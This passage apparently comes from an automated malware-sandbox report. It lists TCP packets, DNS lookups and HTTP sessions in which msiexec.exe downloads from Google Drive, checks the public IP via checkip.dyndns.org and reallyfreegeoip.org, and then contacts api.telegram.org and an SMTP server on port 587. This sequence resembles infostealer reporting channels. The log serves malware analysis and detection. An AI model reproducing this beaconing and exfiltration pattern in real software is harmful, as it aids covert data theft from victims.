                                                                                          Oct 22, 2024 16:04:18.130230904 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.132647991 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.132700920 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.132705927 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.132744074 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.132747889 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.132790089 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.135308981 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.135375023 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.135381937 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.135423899 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.137444973 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.137511015 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.137516022 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.137552023 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.139753103 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.139799118 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.139823914 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.139859915 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.168385983 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.168469906 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.168508053 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.168519974 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.168554068 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.168567896 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.168576956 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.168596029 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.168600082 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.168637991 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.168642044 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.168647051 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.168674946 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.168683052 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.168718100 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.168721914 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.168759108 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.168762922 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.168798923 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.169234991 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.169291973 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.169297934 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.169341087 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.169344902 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.169385910 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.169389963 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.169435024 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.169687986 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.169727087 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.169743061 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.169779062 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.169785023 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.169827938 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.169833899 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.169872046 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.169888973 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.169926882 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.169930935 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.169966936 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.170006990 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.170042992 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.170584917 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.170635939 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.170641899 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.170685053 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.170690060 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:28.916474104 CEST4972480192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:28.921853065 CEST8049724193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:29.574677944 CEST8049724193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:29.576064110 CEST49725443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:29.576108932 CEST44349725188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:29.576216936 CEST49725443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:29.576499939 CEST49725443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:29.576510906 CEST44349725188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:29.624943018 CEST4972480192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:30.173655987 CEST44349725188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:30.175339937 CEST49725443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:30.175385952 CEST44349725188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:30.315337896 CEST44349725188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:30.315428972 CEST44349725188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:30.315509081 CEST49725443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:30.315964937 CEST49725443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:30.319032907 CEST4972480192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:30.319777012 CEST4972680192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:30.324909925 CEST8049724193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:30.325028896 CEST4972480192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:30.325551987 CEST8049726193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:30.325628996 CEST4972680192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:30.325721025 CEST4972680192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:30.331250906 CEST8049726193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:30.988492966 CEST8049726193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:31.029916048 CEST49727443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:31.029967070 CEST44349727188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:31.030067921 CEST49727443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:31.030268908 CEST4972680192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:31.030535936 CEST49727443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:31.030546904 CEST44349727188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:31.646409988 CEST44349727188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:31.647941113 CEST49727443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:31.647963047 CEST44349727188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:31.792936087 CEST44349727188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:31.793045998 CEST44349727188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:31.793176889 CEST49727443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:31.793632984 CEST49727443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:31.822829962 CEST4972680192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:31.828690052 CEST8049726193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:31.828923941 CEST4972680192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:31.830674887 CEST49728443192.168.2.10149.154.167.220
                                                                                          Oct 22, 2024 16:04:31.830712080 CEST44349728149.154.167.220192.168.2.10
                                                                                          Oct 22, 2024 16:04:31.831253052 CEST49728443192.168.2.10149.154.167.220
                                                                                          Oct 22, 2024 16:04:31.831716061 CEST49728443192.168.2.10149.154.167.220
                                                                                          Oct 22, 2024 16:04:31.831727982 CEST44349728149.154.167.220192.168.2.10
                                                                                          Oct 22, 2024 16:04:32.663609028 CEST44349728149.154.167.220192.168.2.10
                                                                                          Oct 22, 2024 16:04:32.663738012 CEST49728443192.168.2.10149.154.167.220
                                                                                          Oct 22, 2024 16:04:32.666831017 CEST49728443192.168.2.10149.154.167.220
                                                                                          Oct 22, 2024 16:04:32.666847944 CEST44349728149.154.167.220192.168.2.10
                                                                                          Oct 22, 2024 16:04:32.667126894 CEST44349728149.154.167.220192.168.2.10
                                                                                          Oct 22, 2024 16:04:32.668617964 CEST49728443192.168.2.10149.154.167.220
                                                                                          Oct 22, 2024 16:04:32.711343050 CEST44349728149.154.167.220192.168.2.10
                                                                                          Oct 22, 2024 16:04:32.902990103 CEST44349728149.154.167.220192.168.2.10
                                                                                          Oct 22, 2024 16:04:32.903064966 CEST44349728149.154.167.220192.168.2.10
                                                                                          Oct 22, 2024 16:04:32.903153896 CEST49728443192.168.2.10149.154.167.220
                                                                                          Oct 22, 2024 16:04:32.905893087 CEST49728443192.168.2.10149.154.167.220
                                                                                          Oct 22, 2024 16:04:38.817065954 CEST4971480192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:39.038866043 CEST49729587192.168.2.10213.165.67.118
                                                                                          Oct 22, 2024 16:04:39.044279099 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:39.044500113 CEST49729587192.168.2.10213.165.67.118
                                                                                          Oct 22, 2024 16:04:39.782625914 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:39.787214994 CEST49729587192.168.2.10213.165.67.118
                                                                                          Oct 22, 2024 16:04:39.792679071 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:40.036479950 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:40.036618948 CEST49729587192.168.2.10213.165.67.118
                                                                                          Oct 22, 2024 16:04:40.041965961 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:40.291269064 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:40.291817904 CEST49729587192.168.2.10213.165.67.118
                                                                                          Oct 22, 2024 16:04:40.298890114 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:40.548450947 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:40.548522949 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:40.548558950 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:40.548585892 CEST49729587192.168.2.10213.165.67.118
                                                                                          Oct 22, 2024 16:04:40.551434994 CEST49729587192.168.2.10213.165.67.118
                                                                                          Oct 22, 2024 16:04:40.558651924 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:40.801074982 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:40.803610086 CEST49729587192.168.2.10213.165.67.118
                                                                                          Oct 22, 2024 16:04:40.809405088 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:41.055737019 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:41.056462049 CEST49729587192.168.2.10213.165.67.118
                                                                                          Oct 22, 2024 16:04:41.062128067 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:41.373395920 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:41.374100924 CEST49729587192.168.2.10213.165.67.118
                                                                                          Oct 22, 2024 16:04:41.379498005 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:41.689507008 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:41.689893961 CEST49729587192.168.2.10213.165.67.118
                                                                                          Oct 22, 2024 16:04:41.695252895 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:41.939440966 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:41.940094948 CEST49729587192.168.2.10213.165.67.118
                                                                                          Oct 22, 2024 16:04:41.946177006 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:41.946259022 CEST49729587192.168.2.10213.165.67.118
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 22, 2024 16:04:12.889697075 CEST | 57120 | 53 | 192.168.2.10 | 1.1.1.1
Oct 22, 2024 16:04:12.898243904 CEST | 53 | 57120 | 1.1.1.1 | 192.168.2.10
Oct 22, 2024 16:04:14.224435091 CEST | 54912 | 53 | 192.168.2.10 | 1.1.1.1
Oct 22, 2024 16:04:14.232245922 CEST | 53 | 54912 | 1.1.1.1 | 192.168.2.10
Oct 22, 2024 16:04:18.449758053 CEST | 62130 | 53 | 192.168.2.10 | 1.1.1.1
Oct 22, 2024 16:04:18.457161903 CEST | 53 | 62130 | 1.1.1.1 | 192.168.2.10
Oct 22, 2024 16:04:19.574568987 CEST | 59112 | 53 | 192.168.2.10 | 1.1.1.1
Oct 22, 2024 16:04:19.799618959 CEST | 53 | 59112 | 1.1.1.1 | 192.168.2.10
Oct 22, 2024 16:04:31.822679996 CEST | 63612 | 53 | 192.168.2.10 | 1.1.1.1
Oct 22, 2024 16:04:31.829875946 CEST | 53 | 63612 | 1.1.1.1 | 192.168.2.10
Oct 22, 2024 16:04:39.026559114 CEST | 56678 | 53 | 192.168.2.10 | 1.1.1.1
Oct 22, 2024 16:04:39.036209106 CEST | 53 | 56678 | 1.1.1.1 | 192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 22, 2024 16:04:12.889697075 CEST | 192.168.2.10 | 1.1.1.1 | 0x5342 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Oct 22, 2024 16:04:14.224435091 CEST | 192.168.2.10 | 1.1.1.1 | 0xf1a3 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Oct 22, 2024 16:04:18.449758053 CEST | 192.168.2.10 | 1.1.1.1 | 0xdf59 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Oct 22, 2024 16:04:19.574568987 CEST | 192.168.2.10 | 1.1.1.1 | 0xe66d | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Oct 22, 2024 16:04:31.822679996 CEST | 192.168.2.10 | 1.1.1.1 | 0x5711 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Oct 22, 2024 16:04:39.026559114 CEST | 192.168.2.10 | 1.1.1.1 | 0xb038 | Standard query (0) | smtp.ionos.es | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 22, 2024 16:04:12.898243904 CEST | 1.1.1.1 | 192.168.2.10 | 0x5342 | No error (0) | drive.google.com | | 142.250.185.174 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 16:04:14.232245922 CEST | 1.1.1.1 | 192.168.2.10 | 0xf1a3 | No error (0) | drive.usercontent.google.com | | 142.250.186.65 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 16:04:18.457161903 CEST | 1.1.1.1 | 192.168.2.10 | 0xdf59 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 22, 2024 16:04:18.457161903 CEST | 1.1.1.1 | 192.168.2.10 | 0xdf59 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 16:04:18.457161903 CEST | 1.1.1.1 | 192.168.2.10 | 0xdf59 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 16:04:18.457161903 CEST | 1.1.1.1 | 192.168.2.10 | 0xdf59 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 16:04:18.457161903 CEST | 1.1.1.1 | 192.168.2.10 | 0xdf59 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 16:04:18.457161903 CEST | 1.1.1.1 | 192.168.2.10 | 0xdf59 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 16:04:19.799618959 CEST | 1.1.1.1 | 192.168.2.10 | 0xe66d | No error (0) | reallyfreegeoip.org | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 16:04:19.799618959 CEST | 1.1.1.1 | 192.168.2.10 | 0xe66d | No error (0) | reallyfreegeoip.org | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 16:04:31.829875946 CEST | 1.1.1.1 | 192.168.2.10 | 0x5711 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 16:04:39.036209106 CEST | 1.1.1.1 | 192.168.2.10 | 0xb038 | No error (0) | smtp.ionos.es | | 213.165.67.118 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 16:04:39.036209106 CEST | 1.1.1.1 | 192.168.2.10 | 0xb038 | No error (0) | smtp.ionos.es | | 213.165.67.102 | A (IP address) | IN (0x0001) | false
• drive.google.com
• drive.usercontent.google.com
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49711 | 193.122.130.0 | 80 | 6624 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 16:04:18.466597080 CEST | 151 | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Oct 22, 2024 16:04:19.138335943 CEST | 323 | IN | HTTP/1.1 200 OK
  Date: Tue, 22 Oct 2024 14:04:19 GMT
  Content-Type: text/html
  Content-Length: 106
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  X-Request-ID: 5a6ffafab35e5eef46b990c6698be328
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>
Oct 22, 2024 16:04:19.142839909 CEST | 127 | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Oct 22, 2024 16:04:19.301644087 CEST | 323 | IN | HTTP/1.1 200 OK
  Date: Tue, 22 Oct 2024 14:04:19 GMT
  Content-Type: text/html
  Content-Length: 106
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  X-Request-ID: 8d722c2c84e8c4a30d780806d1c5cb83
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>
Oct 22, 2024 16:04:20.598944902 CEST | 127 | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Oct 22, 2024 16:04:20.758388996 CEST | 323 | IN | HTTP/1.1 200 OK
  Date: Tue, 22 Oct 2024 14:04:20 GMT
  Content-Type: text/html
  Content-Length: 106
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  X-Request-ID: a9ef2b7f86de2fae8089c6b87526b6a7
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49714 | 193.122.130.0 | 80 | 6624 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 16:04:21.530924082 CEST | 127 | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Oct 22, 2024 16:04:22.201797009 CEST | 323 | IN | HTTP/1.1 200 OK
  Date: Tue, 22 Oct 2024 14:04:22 GMT
  Content-Type: text/html
  Content-Length: 106
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  X-Request-ID: 2cd51c09179355f5efef49b69f3ac6fa
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49716 | 193.122.130.0 | 80 | 6624 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 16:04:22.965133905 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 22, 2024 16:04:23.627620935 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:04:23 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 29019096fc92f2deb56b0d9331c044cb
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.10 | 49718 | 193.122.130.0 | 80 | 6624 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 16:04:24.393897057 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 22, 2024 16:04:25.238945007 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:04:25 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 1c562de5112e67fa3f1947dcbd1fdd84
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.10 | 49720 | 193.122.130.0 | 80 | 6624 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 16:04:26.039328098 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 22, 2024 16:04:26.703584909 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:04:26 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 2c39c2343af0ab9073c91cb2daebfb1b
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.10 | 49722 | 193.122.130.0 | 80 | 6624 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 16:04:27.475423098 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 22, 2024 16:04:28.137046099 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:04:28 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
